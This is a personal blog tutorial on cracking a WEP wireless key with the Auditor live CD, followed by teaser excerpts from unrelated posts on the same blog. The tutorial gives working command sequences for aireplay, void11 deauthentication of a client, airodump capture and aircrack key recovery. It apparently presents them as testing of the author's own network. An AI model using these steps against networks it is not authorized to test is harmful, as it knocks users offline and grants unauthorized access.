Skip to main content

WEP Cracking with Auditor CD

Since I can't find all of my instructions due to a crappy 16GB DataStickSport Thumbdrive crash, I heavily used this site for referencehttp://www.smallnetbuilder.com/content/view/24242/98/.

There are two ways of cracking WEP.  The totally passive way, which is to just listen and gather enough weak IVs to crack the key (long and boring), or the active way, which requires two wireless cards (one to transmit traffic to generate the weak IVs, and the other to receive the weak IVs).   

I'll walk through the active way, as the passive simply requires Aerodumping the packets with the Aerodump scripts below in one terminal, and Aircracking them with the Aircrack scripts below in a separate window (can be done at same time).  I'm tailoring these scripts for the Security Auditor CD on two different boxes, as this is often more convienient than installing the tools on a production box, or dealing with fighting cards.  

First, conduct a scan of your network:  Kismet works wonders for this. 

you should have written down the following four pieces of information:
  • MAC Address of the wireless Access Point (AP)
  • MAC Address of the "Target" computer
  • BSSID of the AP
  • Wi-Fi channel used
Next, to generate enough traffic to crack a key, the best way is to replay an ARP association packet (much faster than sending bogus large pings or something).  So you'll need to capture an ARP packet of a client on the network associating.  You can set there and wait for someone to associate, or you can kick someone off the network and catch the association packet.  Let's do the latter.

Start up Aireplay to capture an ARP packet and replay it:
switch-to-wlanng
cardctl eject
cardctl insert
monitor.wlan wlan0 THECHANNELNUM
cd /ramdisk
aireplay -i wlan0 -b MACADDRESSOFAP -m 68 -n 68 -d ff:ff:ff:ff:ff:ff
#my Netgear
#aireplay -i wlan0 -b 00:09:5b:3e:39:96 -t 1 -f 0 -d ff:ff:ff:ff:ff:ff
Use Void11 to knock off your client:
switch-to-hostap
cardctl eject
cardctl insert
iwconfig wlan0 channel THECHANNELNUM
iwpriv wlan0 hostapd 1
iwconfig wlan0 mode master
void11_penetration -D -s MACOFSTATION -B MACOFAP wlan0
#void11_penetration -D -s 00:0f:3d:a9:0e:b4 -B 00:13:10:0e:e4:4b -m 50 wlan0
Aireplay will prompt you to replay a packet.  Replay the captured packet if it matches the following criteria:
  • FromDS - 0
  • ToDS - 1
  • BSSID - MAC Address of the Target AP
  • Source MAC - MAC Address of the Target computer
  • Destination MAC - FF:FF:FF:FF:FF:FF
Don't forget to Stop your deauthentication with VOID11 at this point.

Now you have one machine generating lots of traffic.  Go to your other machine(or other card) to capture those packets and break them.

Start Aerodump to capture the network traffic:
switch-to-wlanng
cardctl eject
cardctl insert
monitor.wlan wlan0 THECHANNELNUM
cd /ramdisk
airodump wlan0 cap1

After Aerodump starts, you should now see the IV count rise to about 200 per second,

Start Aircrack, and wait for your key to pop out:
cd /ramdisk
aircrack -f FUDGEFACTOR -m MACADDRESSOFAP -n WEPKEYLENGTH -q 3 cap*.cap
#My Netgear
#aircrack -f 2 -m 00:0c:41:f6:33:27 -n 128 -q 3 cap*.cap


Comments

Popular posts from this blog

HP c6180 Printer and Vista

Hp c6180 driver issues with Vista Home Premium My wife has a Vista Home Premium laptop, and the HP C6180 Photosmart printer keeps disappearing from her available printers.  The only way I've found to fix the problem is to reinstall all the HP software. When I do this, I have to download the (large..507M software from HP, or reinstall the printer (ONLY the printer, not the scanner) with the installation disk, as the drivers are not discovered with a "Windows Update" setting.  My guess is that is because HP doesn't like people to install only the printer driver, which would be easy, but they want folks to install all their crapware as well, so they are withholding the drivers from the on-line Microsoft printer database.  So keep your installation CD!  I've also found that unless I install everything on the CD or in the Full Version download (HP Customer Participation Program, HP Imaging Device functions, HP OCR SW, HP All-In-one SW, HP Photosmart Essential, HP

atftpd vs tftpd-hpa

Recently I was trying to tftp files from a Windows computer to a Kali box.   One version of Windows worked, but another didn't.    After much troubleshooting, here were my symptoms: I could tftp a file from-to any Kali box from-to another Kali box I could NOT tftp files to a specific Windows 7 box from any Kali box I could NOT tftp files to a Chrooted-Ubuntu-Chromebook box from a Kali box After MUCH troubleshooting, going through every setting in atftpd, it seemed like it literally was a client OS problem.  Different clients simply would not download files---unacceptable. Thus, I switched to tftpd-hpa.   To install: apt-get install tftpd-hpa files go to/come from /srv/tftp, but it needs to be a tftp user. Thus, I needed to: chroot -R /srv/tftp Also, if you want to be able to put files ON the tftp server (from a client), you need to modify /etc/default/tftpd-hpa: change "TFTP_OPTIONS="--secure"  to "TFTP_OPTIONS="--secure --create" I al

Security Onion on the Antsle

My Setup of Security Onion on the Antsle: Recently my IDS box, an Intel Atom D2500 Fanless Mini-ITX PC, D2500CCE, died.  Truth be told, I think it came from the factory in a bad state, as I originally thought I had a bad graphics driver, but I then noticed that, after much troubleshooting, it wasn't a driver issue at all.  The box just sometimes wouldn't boot up correctly with video.  It seems heat related, something like not enough thermal paste on the CPU, as after it is powered off for a while it is more likely to boot than when it is warm.  Along with that issue, this box maxed out at 4GB of RAM (only has 2 memory slots, each of which will only take a 2GB card max) and had a single processor, so it was under powered for Security Onion. So, I decided to quit limping along on P.O.S. boxes, and buy a little more heavyweight box for my networked IDS.   Security Onion requires a minimum of 8GB of RAM, and 4 cores per their specs page https://github.com/secur